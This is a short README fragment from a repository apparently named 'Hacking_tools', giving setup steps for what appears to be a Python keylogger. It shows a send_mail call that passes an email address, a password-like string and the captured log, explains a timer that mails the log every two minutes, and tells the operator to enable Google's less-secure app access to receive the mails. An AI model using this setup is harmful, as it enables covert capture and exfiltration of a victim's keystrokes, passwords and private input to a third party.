ArunKumar9538/Hacking_tools/README.md

 For Ex: self.send_mail("arnavkumar6360@gmail.com", "abc123def456", self.log)

+Timer is set to 120s.
+So at every 2min u will get a mail.
+For better result please set timer to high. ( timer = threading.Timer(5, self.report) )

 [+] Also enable the Less secure app access of your google account to receive the mail send by the program.